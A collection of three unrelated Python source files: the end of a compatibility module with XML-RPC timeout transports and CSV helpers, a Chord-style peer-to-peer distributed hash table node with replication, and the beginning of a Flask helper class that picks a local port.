raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
#
# Mixin for running subprocesses and capturing their output
#
class SubprocessMixin(object):
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub(r"[-_.]+", "-", name).lower()
|
node.py
|
from hashlib import sha1
import requests
import json
import random
from source.message import *
from source.lib import *
import threading
'''
Contains code for node class
implementing basic insertion, query operations
to the network. It handles graceful join and departure
'''
def getId(ip):
return int(sha1(ip.encode()).hexdigest(),16)%10
class Node:
'''
orismoi
'''
def __init__(self, ip, BOOTSTRAP_IP, n_replicas=1, isBootstrap=False, policy=None, verbose=True):
'''initializations'''
if(verbose):
print(f"Created node with ip: {ip}, bootstrap ip: {BOOTSTRAP_IP}, isBootstrap={isBootstrap}")
self.ip=ip
self.isBootstrap = isBootstrap
self.BOOTSTRAP_IP = BOOTSTRAP_IP
#self.id = None #sha1(self.ip.encode()).hexdigest() #hash in hexadecimal
self.assigned_id = None #assigned Chord position
self.DHT = {} # hash table for this node
self.prev_ip = None
self.next_ip = None
self.prev_id = None
self.next_id = None
self.policy = None
self.msg_id = 0
self.responses = {}
self.ack = {}
self.ack_value = {}
self.n_replicas = n_replicas
if self.n_replicas > 1:
self.repl_DHT = {} # key: hashkey, value: val (dummy). Data replicated from other nodes.
self.replicas = {} # key: id, value: ip for the node's replicas.
self.prev_nodes = {} #key: id, value ip for the node's previous nodes
self.policy = policy
def clear(self):
self.__init__(ip=self.ip, BOOTSTRAP_IP=self.BOOTSTRAP_IP, \
n_replicas=self.n_replicas, isBootstrap=self.isBootstrap, verbose=False)
def set_prev(self, ip, id):
'''
Update node's previous node with input ip
'''
self.prev_ip = ip
self.prev_id = id
def set_next(self, ip, id):
'''
Update node's next node with input ip
'''
self.next_ip = ip
self.next_id = id
def setDHT(self,dht_dict):
self.DHT = dht_dict.copy()
def setReplDHT(self, repl_dht_dict):
self.repl_DHT = repl_dht_dict.copy()
def setAck(self, msg_id, msg_val):
self.ack[msg_id] = msg_val
def setAckValue(self, msg_id, msg_val):
self.ack_value[msg_id] = msg_val
def setOverlayResponses(self, msg_id, msg_val):
print("a:", msg_id)
print("type of msg_id:", type(msg_id))
if type(msg_id)==str:
self.responses[msg_id] = msg_val
print("dict:", self.responses)
else:
print("Set Overlay Response ERRROR")
def insertToDht(self, key, hash, val):
self.DHT[hash][key] = val
def deleteFromDht(self, key, hash):
if key in self.DHT[hash]:
self.DHT[hash].pop(key)
def queryFromDht(self, key, hash):
if key in self.DHT[hash]:
res = self.DHT[hash][key]
else:
res ="Not found"
return res
def insertToReplDht(self, key, hash, val):
self.repl_DHT[hash][key] = val
def deleteFromReplDht(self, key, hash):
if key in self.repl_DHT[hash]:
self.repl_DHT[hash].pop(key)
def queryFromReplDht(self, key, hash):
if key in self.repl_DHT[hash]:
res = self.repl_DHT[hash][key]
else:
res ="Not found"
return res
def notify_join_prev(self):
ntf_prev_req = (requests.get("http://"+self.prev_ip+f"/accept_join_next/{self.ip}/{self.assigned_id}")).json()
def notify_join_next(self):
ntf_next_req = (requests.get("http://"+self.next_ip+f"/accept_join_prev/{self.ip}/{self.assigned_id}")).json()
# this should be of the form status. , list of all keys in next's DHT
self.DHT = ntf_next_req["DHT"]
def notify_depart_prev(self):
ntf_prev_req = (requests.get("http://"+self.prev_ip+f"/accept_depart_next/{self.next_ip}/{self.next_id}")).json()
def notify_depart_next(self):
#print("DHT", self.DHT)
departee_dict = json.dumps(self.DHT)
#print("JSON:", departee_dict)
ntf_next_req = (requests.post("http://"+self.next_ip+f"/accept_depart_prev/{self.prev_ip}/{self.prev_id}",\
json=self.DHT)).json()
def notify_repl_join_next(self):
'''
notify the k-1 next neighbours to get the appropriate keys
If not using replicas, this function doesn't do anything
'''
print("\x1b[31mNext Nodes:\x1b[0m", self.replicas.keys())
if self.n_replicas > 1:
# this is equivalent to replicas!={}
# that is, the Network doesnt use replicas
for repl_ip in self.replicas.values():
# get replicas DHT
replicas_DHT = (requests.get("http://"+repl_ip+"/get_DHT")).json()["DHT"]
# and merge it with current node's repl_DHT
self.repl_DHT = merge_dict(self.repl_DHT, replicas_DHT)
def notify_repl_join_prev(self, overlay):
'''
notify the k-1 prev neighbours to get the appropriate keys.
If not using replicas, this function doesn't do anything.
'''
print("\x1b[31mPrev Nodes:\x1b[0m", self.prev_nodes.keys())
if self.n_replicas > 1:
counter = list(range(self.n_replicas, 0, -1))
for i, repl_ip in enumerate(self.prev_nodes.values()):
# notify previous nodes to delete appropriate keys from their repl_DHT
# since other nodes replicate them now (after a join)
if len(overlay) > self.n_replicas:
req = (requests.post("http://"+repl_ip+f"/delete_from_repl_DHT/{self.assigned_id}/{counter[i]}", json=overlay)).json()
add = (requests.post("http://"+repl_ip+f"/insert_me_to_your_repl_DHT", json=self.DHT)).json()
def find_DHT_part(self, n, overlay):
temp = str(self.assigned_id)
flag_start = temp
for i in range(int(n)-1):
temp = overlay[temp]
if i == int(n)-3:
flag_start = temp
flag_end = temp
length = (int(flag_end) - int(flag_start)) % 10
keys = [(i+int(flag_start)) % 10 for i in range(1, length+1)]
DHT = {}
print("\x1b[36mRepl DHT\x1b[0m", self.repl_DHT.keys())
for key in keys:
DHT[str(key)] = self.repl_DHT[str(key)]
return DHT
def notify_repl_depart_prev(self, overlay):
if self.n_replicas > 1:
counter = list(range(self.n_replicas, 0, -1))
for i, repl_ip in enumerate(self.prev_nodes.values()):
# notify previous nodes to delete appropriate keys from their repl_DHT
# since other nodes replicate them now (after a join)
DHT = self.find_DHT_part(counter[i], overlay)
print("\x1b[32mDHT keys to be inserted\x1b[0m", DHT.keys())
req = (requests.post("http://"+repl_ip+f"/insert_to_repl_DHT", json=DHT)).json()
#add = (requests.post("http://"+repl_ip+f"/insert_me_to_your_repl_DHT", json=self.DHT)).json()
def join(self):
'''
API request to join the P2P network.
Request is sent to self.BOOTSTRAP_IP
should set self.prev, self.next
'''
if self.isBootstrap:
self.assigned_id = getId(self.ip)
self.id_ip_dict[self.assigned_id] = self.ip
self.overlay_dict= {str(self.assigned_id):None}
self.reverse_overlay_dict = {str(self.assigned_id):None}
print("joined with assigned id", self.assigned_id)
# load data from local directory. ONLY FOR TESTING DELETE LATER
# print("http://"+self.ip+"/load_data_from_file")
# requests.get("http://"+self.ip+"/load_data_from_file")
return {"text": "This is the bootstrap node", \
"assigned_position": getId(self.ip),\
"prev": self.prev_ip, \
"next": self.next_ip, \
"status": "Success" }
else:
join_req = (requests.get("http://"+self.BOOTSTRAP_IP+f"/check_join/{self.ip}")).json()
self.prev_ip = join_req["prev_ip"]
self.next_ip = join_req["next_ip"]
self.prev_id = getId(join_req["prev_ip"])
self.next_id = getId(join_req["next_ip"])
self.replicas = join_req["replicas"]
self.prev_nodes = join_req["prev_nodes"]
self.assigned_id = join_req["assigned_position"]
overlay = join_req["overlay"]
print("joined with assigned id", self.assigned_id, "prev id", \
self.prev_id, "next id", self.next_id)
# notify previous and next node. Get corresponding DHTs.
self.notify_join_prev()
self.notify_join_next()
# notify previous and next to refresh their repl_DHT and update current node's repl_DHT
self.notify_repl_join_prev(overlay)
self.notify_repl_join_next()
return {"status": "Success", \
"text": f"Joined with prev: {self.prev_ip}, next: {self.next_ip}", \
"prev": self.prev_ip, \
"next": self.next_ip, \
"assigned_position": self.assigned_id
}
def depart(self):
'''
API request to gracefully depart from the P2P Network.
Request is sent to self.BOOTSTRAP_IP
should update prev, next
'''
if self.isBootstrap:
return {"text": "This is Bootstrap node. Undefined Behavour",\
"status": "Success"}
else:
depart_req = (requests.get("http://"+self.BOOTSTRAP_IP+f"/check_depart/{self.assigned_id}")).json()
if depart_req["status"] == "Success":
# must notify neighbours about departure
self.prev_nodes = depart_req["prev_nodes"]
self.overlay = depart_req["overlay"]
self.notify_depart_prev()
self.notify_depart_next()
self.notify_repl_depart_prev(self.overlay)
print("\x1b[36mID:\x1b[0m", self.assigned_id)
req = (requests.get("http://"+self.BOOTSTRAP_IP+f"/update/{str(self.assigned_id)}")).json()
self.clear()
return {"status": "Success", \
"text": f"Depart from P2P network with id {self.assigned_id}, prev {self.prev_id} and next {self.next_id}."}
else:
print(f"\x1b[31mError at depart procedure for id {self.assigned_id}\x1b[0m")
def insert(self, key, value):
'''
API request to insert value. If it already exists
then the value is updated instead.
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
self.insertToDht(key, hashkey, value)
return {"status": "Success", \
"text": f"Successfuly added {key}, {value} in node {self.assigned_id}"}
else:
msg_id = self.getMsgId()
self.setAck(msg_id, False)
#print("First Node:", self.getAck())
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, sender_ip=self.ip, msg="", key_data=key, val_data=value)
# propagate insertion to next node
insert_req = (requests.post(f"http://{self.next_ip}/propagate_insert/", json=insert_msg.__dict__)).json()
# wait for response at wait4insert endpoint.
wait_req = (requests.get("http://"+self.ip+f"/wait4insert/{msg_id}")).json()
return wait_req
def threading_node_replicas(self, dictionary, mode):
req = (requests.post(f"http://{self.next_ip}/threading_replicas/{mode}", json=dictionary)).json()
return req
def insert_eventual(self, key, value):
'''
API request to insert value to all replicas following eventual consistency
linearilizability. If it already exists
then the value is updated instead.
Only to be called when replication is enabled.
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
print("\x1b[36mHashkey:\x1b[0m", hashkey)
print("\x1b[36mDHT keys:\x1b[0m", self.getDHT().keys())
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.insertToDht(key, hashkey, value)
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
# propagate replica insert to replicas. Start with counter = n_replicas-1
mode = "Insertion"
x = threading.Thread(target=self.threading_node_replicas, args = [insert_msg.__dict__, mode])
x.start()
return {"status": "Success", \
"text": f"Successfuly added {key}, {value} in node {self.assigned_id}"}
x.join()
# elif hashkey in self.getReplDHT().keys():
else:
# node is not replica manager for this particular hashkey
if hashkey in self.getReplDHT().keys():
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1,direction = 'l')
else:
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
insert_req = (requests.post(f"http://{self.next_ip}/propagate_insert_2manager/", json=insert_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4insert/{msg_id}")).json()
return wait_req
def insert_chain(self, key, value):
'''
API request to insert value to all replicas following eventual consistency
linearilizability. If it already exists
then the value is updated instead.
Only to be called when replication is enabled with chain replication.
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
print("\x1b[36mHashkey:\x1b[0m", hashkey)
print("\x1b[36mDHT keys:\x1b[0m", self.getDHT().keys())
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.insertToDht(key, hashkey, value)
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
# propagate replica insert to replicas. Start with counter = n_replicas-1
mode = "Insertion"
insert_req = (requests.post(f"http://{self.next_ip}/threading_replicas/{mode}", json=insert_msg.__dict__)).json()
return {"status": "Success", \
"text": f"Successfuly added {key}, {value} in node {self.assigned_id}"}
# elif hashkey in self.getReplDHT().keys():
else:
if hashkey in self.getReplDHT().keys():
# node is not replica manager for this particular hashkey
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1, direction='l')
else:
# node is not replica manager for this particular hashkey
insert_msg = InsertionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
val_data=value, replica_counter=self.n_replicas-1)
insert_req = (requests.post(f"http://{self.next_ip}/propagate_insert_2manager/", json=insert_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4insert/{msg_id}")).json()
return wait_req
def delete(self, key):
'''
API request to delete pair with given key. If it doesnt exists
then nothing happens
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
self.deleteFromDht(key, hashkey)
return {"status": "Success", \
"text": f"Successfuly removed pair with key: {key} from node: {self.assigned_id}"}
else:
# current node not responsible for hashKey. Construct Delete Message
msg_id = self.getMsgId()
self.setAck(msg_id, False)
#print("First Node:", self.getAck())
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, sender_ip=self.ip, msg="", key_data=key)
# propagate deletion to next node
deletion_req = (requests.post(f"http://{self.next_ip}/propagate_delete/", json=delete_msg.__dict__)).json()
# wait for response at wait4delete route
wait_req = (requests.get("http://"+self.ip+f"/wait4delete/{msg_id}")).json()
return wait_req
def delete_eventual(self, key):
'''
API request to delete pair with given key. If it doesnt exists
then nothing happens
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
# print("\x1b[36mHashkey:\x1b[0m", hashkey)
# print("\x1b[36mDHT keys:\x1b[0m", self.getDHT().keys())
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.deleteFromDht(key, hashkey)
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
# propagate replica insert to replicas. Start with counter = n_replicas-1
mode = "Deletion"
y = threading.Thread(target=self.threading_node_replicas, args = [delete_msg.__dict__, mode])
y.start()
return {"status": "Success", \
"text": f"Successfuly deleted {key} from node {self.assigned_id}"}
y.join()
else:
# node is not replica manager for this particular hashkey
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
delete_req = (requests.post(f"http://{self.next_ip}/propagate_delete_2manager/", json=delete_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4delete/{msg_id}")).json()
return wait_req
def delete_chain(self, key):
'''
API request to delete pair with given key. If it doesnt exists
then nothing happens. Chain replication
'''
hashkey = str(getId(key))
msg_id = self.getMsgId()
if hashkey in self.getDHT().keys():
# node is replica manager for this particular hashkey
self.deleteFromDht(key, hashkey)
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
# propagate replica insert to replicas. Start with counter = n_replicas-1
mode = "Deletion"
delete_req = (requests.post(f"http://{self.next_ip}/threading_replicas/{mode}", json=delete_msg.__dict__)).json()
return {"status": "Success", \
"text": f"Successfuly deleted {key} from node {self.assigned_id}"}
else:
# node is not replica manager for this particular hashkey
delete_msg = DeletionMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="", key_data=key,\
replica_counter=self.n_replicas-1)
delete_req = (requests.post(f"http://{self.next_ip}/propagate_delete_2manager/", json=delete_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4delete/{msg_id}")).json()
return wait_req
def query(self, key):
'''
API request the value that corresponds to a
key stored in a node's hash table
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
queryVal = self.queryFromDht(key, hashkey)
return {"status": "Success", \
"text": f"Successful query for pair with key: {key} from node: {self.assigned_id}. Result: {queryVal}", \
"queryValue": queryVal}
else:
# current node not responsible for hashKey. Construct Delete Message
msg_id = self.getMsgId()
# set ack to False, since node has not received ack for request
self.setAck(msg_id, False)
# set ackvalue to None, since node has not received ack for request
self.setAckValue(msg_id, None)
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id, sender_ip=self.ip, msg="", key_data=key)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query/", json=query_msg.__dict__)).json()
# wait for response at wait4query route
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
def query_eventual(self, key):
'''
API request the value that corresponds to a
key stored in a node's hash table
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
queryVal = self.queryFromDht(key, hashkey)
return {"status": "Success", \
"text": f"Successful query for pair with key: {key} from node: {self.assigned_id}. Result: {queryVal}", \
"queryValue": queryVal}
elif hashkey in self.getReplDHT().keys():
queryVal = self.queryFromReplDht(key, hashkey)
return {"status": "Success", \
"text": f"Successful query for pair with key: {key} from node: {self.assigned_id}. Result: {queryVal}", \
"queryValue": queryVal}
else:
# current node not responsible for hashKey. Construct Delete Message
msg_id = self.getMsgId()
# set ack to False, since node has not received ack for request
self.setAck(msg_id, False)
# set ackvalue to None, since node has not received ack for request
self.setAckValue(msg_id, None)
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query_repl/", json=query_msg.__dict__)).json()
# wait for response at wait4query route
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
def query_chain(self, key):
'''
API request the value that corresponds to a
key stored in a node's hash table
'''
hashkey = str(getId(key))
if hashkey in self.getDHT().keys():
# queryVal = self.queryFromDht(key, hashkey)
msg_id = self.getMsgId()
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query_repl/", json=query_msg.__dict__)).json()
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
else:
# current node not responsible for hashKey. Construct Delete Message
msg_id = self.getMsgId()
# set ack to False, since node has not received ack for request
self.setAck(msg_id, False)
# set ackvalue to None, since node has not received ack for request
self.setAckValue(msg_id, None)
if hashkey in self.getReplDHT().keys():
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1, direction='l')
else:
query_msg = QueryMessage(msg_id=msg_id, sender_id=self.assigned_id,\
sender_ip=self.ip, msg="", key_data=key, replica_counter = self.n_replicas - 1)
# propagate query to next node
query_req = (requests.post(f"http://{self.next_ip}/propagate_query_2manager/", json=query_msg.__dict__)).json()
# wait for response at wait4query route
wait_req = (requests.get("http://"+self.ip+f"/wait4query/{msg_id}")).json()
return wait_req
def query_all(self):
'''
API request all <key, value> pairs in the P2P network (for every node)
'''
msg_id = self.getMsgId()
queryall_msg = QueryAllMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_DHT=self.DHT, msg="")
# begin asking for query * from next ip
queryall_req = (requests.post(f"http://{self.next_ip}/add2queryall", json=queryall_msg.__dict__)).json()
# wait for response at wait4queryall route
queryall_response = (requests.get(f"http://{self.ip}/wait4queryall/{msg_id}")).json()
return queryall_response
def getBootstrap(self):
return self.isBootstrap
def get_n_replicas(self):
'''
returns number of replicas
'''
return self.n_replicas
def getNext(self):
'''
get next node's id
'''
return self.next_id
def getNextIp(self):
'''
get next node's ip
'''
return self.next_ip
def getPrev(self):
'''
get previous node's id
'''
return self.prev_id
def getPrevIp(self):
'''
get prev node's ip
'''
return self.prev_ip
def getAssignedId(self):
'''
returns node's assigned id
'''
return self.assigned_id
def getIp(self):
'''
returns node's ip
'''
return self.ip
def getDHT(self):
'''
get DHT from local Node
'''
return self.DHT
def getReplDHT(self):
'''
get Replica DHT from local Node
'''
return self.repl_DHT
def getTotalDHT(self):
'''
Returns DHT merged with replica DHT.
'''
return merge_dict(self.DHT, self.repl_DHT)
def getMsgId(self):
'''
Returns unique message id concatenated with NodeId.
The Id is unique globally.
'''
print("before: ", self.msg_id)
self.msg_id += 1
print("after: ", self.msg_id)
return str(self.assigned_id) + "_" + str(self.msg_id)
def getPolicy(self):
'''
Returns Nodes replication policy, if anything
'''
return self.policy
def getOverlay(self):
'''
API request to get overlay of network's topology.
'''
msg_id = self.getMsgId()
overlay_msg = OverlayMessage(msg_id=msg_id, sender_id=self.assigned_id, \
sender_ip=self.ip, msg="")
# begin asking for overlay from next ip
overlay_req = (requests.post(f"http://{self.next_ip}/add2overlay/", json=overlay_msg.__dict__)).json()
# wait for response at wait4overlay route
overlay_response = (requests.get(f"http://{self.ip}/wait4overlay/{self.assigned_id}/{msg_id}")).json()
return overlay_response
def getOverlayResponses(self):
return self.responses
def getAck(self):
return self.ack
def getAckValue(self):
return self.ack_value
class BootstrapNode(Node):
def __init__(self, ip, n_replicas, policy):
super().__init__(ip, ip, n_replicas, True, policy)
self.id_ip_dict = {} # key: int, value: str
self.overlay_dict = {} # key: node_id (str), value: node's next id (str). Following "next" order
self.reverse_overlay_dict={} # key: node_id, value: node's prev id. Following "prev" order
for i in range(10):
self.DHT[str(i)] = {}
def check_join(self, joinee_ip):
'''
returns assigned position, prev_ip, next_ip,
'''
joinee_id = getId(joinee_ip)
if joinee_id in self.id_ip_dict:
joinee_id = \
random.choice(list({0,1,2,3,4,5,6,7,8,9} - set(self.id_ip_dict.keys())))
self.id_ip_dict[joinee_id] = joinee_ip
keys_in_dict = sorted(list(self.id_ip_dict.keys()))
self_index_in_dict = keys_in_dict.index(joinee_id)
# get previous nodes ips, ids
prev_id = keys_in_dict[(self_index_in_dict -1)%len(keys_in_dict)]
next_id = keys_in_dict[(self_index_in_dict +1)%len(keys_in_dict)]
prev_ip = self.id_ip_dict[prev_id]
next_ip = self.id_ip_dict[next_id]
# update overlay dict
self.overlay_dict[str(joinee_id)] = str(next_id)
self.reverse_overlay_dict[str(joinee_id)] = str(prev_id)
if len(self.overlay_dict) == 2:
self.overlay_dict[str(next_id)] = str(joinee_id)
self.reverse_overlay_dict[str(prev_id)] = str(joinee_id)
else:
self.overlay_dict[str(prev_id)] = str(joinee_id)
self.reverse_overlay_dict[str(next_id)] = str(joinee_id)
print("\x1b[33mOverlay\x1b[0m:", self.overlay_dict)
print("\x1b[33mId-Ip\x1b[0m:", self.id_ip_dict)
print("\x1b[33mJoinee\x1b[0m:", joinee_id, type(joinee_id))
# if Network uses replicas:
if self.n_replicas > 1:
# find n_replicas-1 next consequent nodes ( to be replicated by callee node)
n_next_nodes = get_n_consequent(self.overlay_dict, self.id_ip_dict,\
self.n_replicas-1, str(joinee_id))
# find n_replicas-1 prev consequent nodes ( that may have to update their repl_DHT)
n_prev_nodes = get_n_consequent(self.reverse_overlay_dict, self.id_ip_dict, \
self.n_replicas-1, str(joinee_id))
else:
n_next_nodes = {}
n_prev_nodes = {}
return joinee_id, prev_ip, next_ip, n_next_nodes, n_prev_nodes, self.overlay_dict
def check_depart(self, departee_id):
# if Network uses replicas:
if self.n_replicas > 1:
# find n_replicas-1 prev consequent nodes ( that may have to update their repl_DHT)
n_prev_nodes = get_n_consequent(self.reverse_overlay_dict, self.id_ip_dict, \
self.n_replicas-1, departee_id)
else:
n_next_nodes = {}
n_prev_nodes = {}
self.id_ip_dict.pop(int(departee_id))
return n_prev_nodes, self.overlay_dict
def get_id_ip_dict(self):
return self.id_ip_dict
if __name__== '__main__':
print("testing node.py")
|
flask_helper.py
|
# Copyright (c) Microsoft Corporation
# Licensed under the MIT License.
from flask import Flask
from .environment_detector import build_environment
from .environments.credentialed_vm_environment import CREDENTIALED_VM
from .environments.public_vm_environment import PUBLIC_VM
import socket
import threading
import atexit
import uuid
import time
from gevent.pywsgi import WSGIServer
LOCALHOST = 'localhost'
VM_ENVS = {CREDENTIALED_VM, PUBLIC_VM}
class FlaskHelper(object):
"""FlaskHelper is a class for common Flask utilities used in dashboards."""
def __init__(self, ip=None, port=None, with_credentials=False):
# The name passed to Flask needs to be unique per instance.
self.app = Flask(uuid.uuid4().hex)
self.port = port
self.ip = ip
self.with_credentials = with_credentials
# dictionary to store arbitrary state for use by consuming classes
self.shared_state = {}
if self.ip is None:
self.ip = "localhost"
if self.port is None:
# Try 100 different ports
available = False
for port in range(5000, 5100):
available = FlaskHelper._is_local_port_available(
self.ip, port, raise_error=False)
if available:
self.port = port
break
if not available:
error_message = """Ports 5000 to 5100 not available.
Please specify an open port for use via the 'port'
parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
FlaskHelper._is_local_port_available(self.ip, self.port,
raise_error=True)
self.env = build_environment(self)
if self.env.base_url is None:
return
# Sleep for 1 second in order to prevent random errors while
# socket is still closing
time.sleep(1)
self._thread = threading.Thread(target=self.run, daemon=True)
